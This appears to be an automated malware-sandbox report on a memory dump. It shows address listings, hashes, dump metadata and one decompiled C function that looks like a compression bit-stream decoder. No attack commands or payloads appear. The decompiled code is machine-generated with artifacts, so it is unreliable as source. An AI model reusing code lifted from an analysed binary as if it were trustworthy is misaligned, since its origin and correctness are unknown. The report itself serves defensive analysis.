0x0026ee06
0x0026ee0b
0x0026ee12
0x0026ee20
0x0026ee2f
0x0026ee31
0x0026ee37
0x0026ee46
0x0026ee49
0x0026ee4c
0x0026ee4d
0x0026ee59
0x0026ee5d
0x0026ee67
0x0026ee69
0x0026ee70
0x0026ee80
0x0026ee89
0x0026ee8b
0x0026ee8e
0x0026ee9a
0x0026eea2
0x0026eea9
0x0026eeac
0x0026eeb0
0x0026eeb6
0x0026eebc
0x0026eec0
0x0026eed0
0x0026eedf
0x0026eee2
0x0026eee4
0x0026eee7
0x0026ef0b
0x0026ef14
0x0026ef17
0x0026ef19
0x0026ef1d
0x0026ef27
0x0026ef2e
0x0026ef44
0x0026ef4e
0x0026ef50
0x0026ef54
0x0026ef62
0x0026ef71
0x0026ef79
0x0026ef7e
0x0026ef85
0x0026ef9e
0x0026efa4
0x0026efa6
0x0026efaa
0x0026efb0
0x0026efb8
0x0026efbd
0x0026efcd
0x0026efd3
0x0026efd7
0x0026efe1
0x00000000
0x00000000
0x0026edf0
0x0026edf0
0x0026efe9
0x0026efea
0x0026efee
0x0026efee
0x0026efee
0x0026eff3
0x0026eff7
0x0026effc
0x0026f001
0x0026f006
0x0026f008
0x0026f00a
0x0026f00e
0x0026f01d
0x0026f02c
0x0026f02e
0x0026f031
0x0026f039
0x0026f03e
0x0026f047
0x0026f04d
0x0026f051
0x0026f055
0x0026f05c
0x0026f05e
0x0026f071
0x0026f080
0x0026f082
0x0026f085
0x0026f08d
0x0026f0a0
0x0026f0a4
0x0026f0a8
0x0026f0ab
0x0026f0bb
0x0026f0c4
0x0026f0ce
0x0026f0d1
0x0026f0d3
0x0026f0da
0x0026f0de
0x0026f0f3
0x0026f0fc
0x0026f100
0x0026f104
0x0026f129
0x0026f132
0x0026f135
0x0026f137
0x0026f13a
0x0026f148
0x0026f155
0x0026f172
0x0026f175
0x0026f179
0x0026f17b
0x0026f17e
0x0026f184
0x0026f18c
0x0026f195
0x0026f199
0x0026f1a2
0x0026f1a6
0x0026f1a8
0x0026f1af
0x0026f1b3
0x0026f1bc
0x0026f1c0
0x0026f1c3
0x0026f1c6
0x0026f1c9
0x0026f1cb
0x0026f1d5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
Instruction ID: c06991907e36a0bc709183b917eecf5ddd5d3f3614ed63f26251e5634daa5bad
Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
Instruction Fuzzy Hash: 7B5259B26187019FC758CF19C891A6AF7E1FFC8304F49892DF9868B255D334E919CB82

Uniqueness

Uniqueness Score: -1.00%

Function 002766A2, Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E002766A2(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00282B5E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00266D3A(0x2a00e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E0026A4ED(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E0026A4ED(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E0026A4ED(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E00273564(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E0026A4ED(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E0026A4ED(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00277D76(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00277D76(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E0026A4ED(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E0027397F(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x002766a7
0x002766ad
0x002766b5
0x002766dc
0x002766df
0x002766e5
0x002766e8
0x002766ea
0x00276702
0x00276709
0x0027670b
0x0027670e
0x00276712
0x00276717
0x00276719
0x0027671b
0x0027671d
0x0027671d
0x0027671f
0x00276723
0x00276723
0x00276725
0x00276727
0x00000000
0x00000000
0x00276729
0x00276729
0x0027672b
0x00276ca2
0x00276ca3
0x00000000
0x00276ca3
0x00276731
0x0027673f
0x0027673f
0x00276741
0x00276750
0x00276750
0x00276756
0x00276c9b
0x00276c9b
0x00000000
0x00276c9b
0x00000000
0x00276756
0x00276743
0x0027674a
0x00000000
0x00000000
0x00000000
0x0027674a
0x00276733
0x00276736
0x00276739
0x00000000
0x00000000
0x00000000
0x0027675c
0x0027675c
0x00276765
0x0027676b
0x0027676d
0x00276770
0x00276779
0x0027677a
0x00276785
0x00276789
0x0027678b
0x00276792
0x00276792
0x00276797
0x00276797
0x0027679d
0x002767a8
0x002767af
0x002767b3
0x002767b9
0x002767c0
0x002767c6
0x002767cc
0x002767d0
0x002767fd
0x002767fe
0x002767ff
0x00276801
0x0027681a
0x0027681d
0x00276824
0x00276827
0x0027682a
0x00276832
0x0027683b
0x0027683f
0x00276841
0x00276844
0x00276846
0x00276846
0x00276848
0x00000000
0x00276848
0x00276806
0x00276809
0x00276809
0x0027680b
0x00000000
0x00000000
0x0027680d
0x0027680e
0x00276811
0x00276814
0x00000000
0x00000000
0x00000000
0x00276816
0x00276818
0x00000000
0x002767d2
0x002767d4
0x002767d7
0x002767e1
0x002767e9
0x002767ee
0x002767f1
0x00276850
0x00276855
0x00276857
0x002768a5
0x002768ab
0x00276b1e
0x00276b20
0x00276b71
0x00276b77
0x00276b86
0x00276b87
0x00276b91
0x00276b94
0x00276b9b
0x00276ba1
0x00276ba7
0x00276bae
0x00276bdb
0x00276bdc
0x00276bdd
0x00276bdf
0x00276bfb
0x00276bfe
0x00276c05
0x00276c08
0x00276c0b
0x00276c16
0x00276c22
0x00276c24
0x00276c2a
0x00276c2c
0x00276c2c
0x00276c2e
0x00276c36
0x00276c36
0x00276c39
0x00276c3c
0x00276c4a
0x00276c4d
0x00276c55
0x00276c58
0x00276c5a
0x00276c5e
0x00276c65
0x00276c6d
0x00276c6f
0x00276c76
0x00276c78
0x00276c78
0x00276c7b
0x00276c7b
0x00276c3e
0x00276c3e
0x00276c3e
0x00276c82
0x00276c86
0x00276c86
0x00276c8a
0x00276c8e
0x00276c92
0x00276723
0x00276723
0x00276725
0x00276727
0x00000000
0x00000000
0x00000000
0x00276727
0x00276723
0x00276be7
0x00276bea
0x00276bea
0x00276bec
0x00000000
0x00000000
0x00276bee
0x00276bef
0x00276bf2
0x00276bf5
0x00000000
0x00000000
0x00000000
0x00276bf7
0x00276bf9
0x00000000
0x00276bf9
0x00276bb2
0x00276bb5
0x00276bbf
0x00276bc7
0x00276bcc
0x00276bcf
0x00000000
0x00276bcf
0x00276b79
0x00276886
0x00276886
0x0027688a
0x0027688e
0x00000000
0x0027688e
0x00276b28
0x00276b2a
0x00276b34
0x00276b3c
0x00276b41
0x00276b42
0x00276b44
0x00276b4d
0x00276b54
0x00276b5f
0x00276b67
0x00276b69
0x00000000
0x00276b69
0x002768b1
0x002768b7
0x002768ba
0x002768c7
0x002768ca
0x002768d0
0x002768d0
0x002768bc
0x002768bc
0x002768bc
0x002768d2
0x002768d5
0x002768d9
0x002768db
0x002768df
0x002768e6
0x002768f0
0x002768f2
0x002768fb
0x002768fd
0x002768fd
0x00276900
0x00276900
0x00276905
0x0027690c
0x00276912
0x00276918
0x0027691f
0x0027694c
0x0027694d
0x0027694e
0x00276950
0x0027696c
0x0027696f
0x00276976
0x00276979
0x0027697c
0x00276987
0x00276993
0x00276995
0x0027699b
0x0027699d
0x0027699d
0x0027699f
0x00000000
0x0027699f
0x00276958
0x0027695b
0x0027695b
0x0027695d
0x00000000
0x00000000
0x0027695f
0x00276960
0x00276963
0x00276966
0x00000000
0x00000000
0x00000000
0x00276968
0x0027696a
0x00000000
0x00276921
0x00276923
0x00276926
0x00276930
0x00276938
0x0027693d
0x00276940
0x002769a7
0x002769a7
0x002769aa
0x002769ad
0x002769bd
0x002769c0
0x002769c0
0x002769af
0x002769af
0x002769af
0x002769c2
0x002769c3
0x002769c7
0x002769c9
0x002769cb
0x00276ad9
0x00276ad9
0x00276adf
0x00276ae5
0x00276ae6
0x00276aea
0x00276af0
0x00276af2
0x00276af3
0x00276af7
0x00276afd
0x00276aff
0x00276aff
0x00276b00
0x00276b00
0x00276afd
0x00276af0
0x00276b04
0x00276b0c
0x00276b12
0x00276b16
0x00000000
0x002769d1
0x002769d1
0x002769d4
0x00276ab5
0x00276abe
0x00276ac6
0x00276aca
0x00276ad1
0x00276ad3
0x00276ad3
0x00276ad6
0x00000000
0x00276ad6
0x002769da
0x002769de
0x002769e7
0x002769f5
0x002769f9
0x00276a00
0x00276a02
0x00276a02
0x00276a05
0x00276a05
0x00276a0a
0x00276a11
0x00276a17
0x00276a1d
0x00276a24
0x00276a51
0x00276a52
0x00276a53
0x00276a55
0x00276a71
0x00276a74
0x00276a7b
0x00276a7e
0x00276a81
0x00276a8c
0x00276a98
0x00276a9a
0x00276aa0
0x00276aa2
0x00276aa2
0x00276aa4
0x00000000
0x00276aa4
0x00276a5d
0x00276a60
0x00276a60
0x00276a62
0x00000000
0x00000000
0x00276a64
0x00276a65
0x00276a68
0x00276a6b
0x00000000
0x00000000
0x00000000
0x00276a6d
0x00276a6f
0x00000000
0x00276a26
0x00276a28
0x00276a2b
0x00276a35
0x00276a3d
0x00276a42
0x00276a45
0x00276aac
0x00276aaf
0x00000000
0x00276aaf
0x00276a24
0x002769cb
0x0027691f
0x00276859
0x00276860
0x00276897
0x00276897
0x0027689c
0x0027689f
0x00000000
0x0027689f
0x00276862
0x00276866
0x00000000
0x00000000
0x00276868
0x0027686e
0x0027686f
0x00276872
0x00000000
0x00000000
0x00276874
0x00276875
0x0027687c
0x00276880
0x00276880
0x00276880
0x00000000
0x00276880
0x002767d0
0x00276723
0x002766ec
0x00000000
0x002766b7
0x002766ba
0x002766be
0x002766c2
0x002766c6
0x002766c7
0x002766ce
0x00000000
0x002766d0
0x002766d0
0x00000000
0x002766d0
0x002766ce

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a9c1968e00ea9a96db61a0236824c35523f698c608332bd11e88e02c121775
Instruction ID: 0cba7ce59569bea6079e7ae86b364a932893e8ee9b21a3679f66f713c1abffac
Opcode Fuzzy Hash: e9a9c1968e00ea9a96db61a0236824c35523f698c608332bd11e88e02c121775
Instruction Fuzzy Hash: D812C3B1620B068BC729CF28C998779B7E0FF55308F14C92ED59BC7A81D774A8A4CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0026BAD1, Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e51705a5f0d775091943fd3d74f60ebd4f31dc626483152942ba7cce560b51
Instruction ID: 078af494ae39769d42531903929bf6b6d8a3ac9561d018f2b98989f1fd0dc058
Opcode Fuzzy Hash: 44e51705a5f0d775091943fd3d74f60ebd4f31dc626483152942ba7cce560b51
Instruction Fuzzy Hash: 4BF18871A283428FC715DE29C48462ABBE6FBC9718F244A2EF4C5C7256D730E995CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00280113, Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

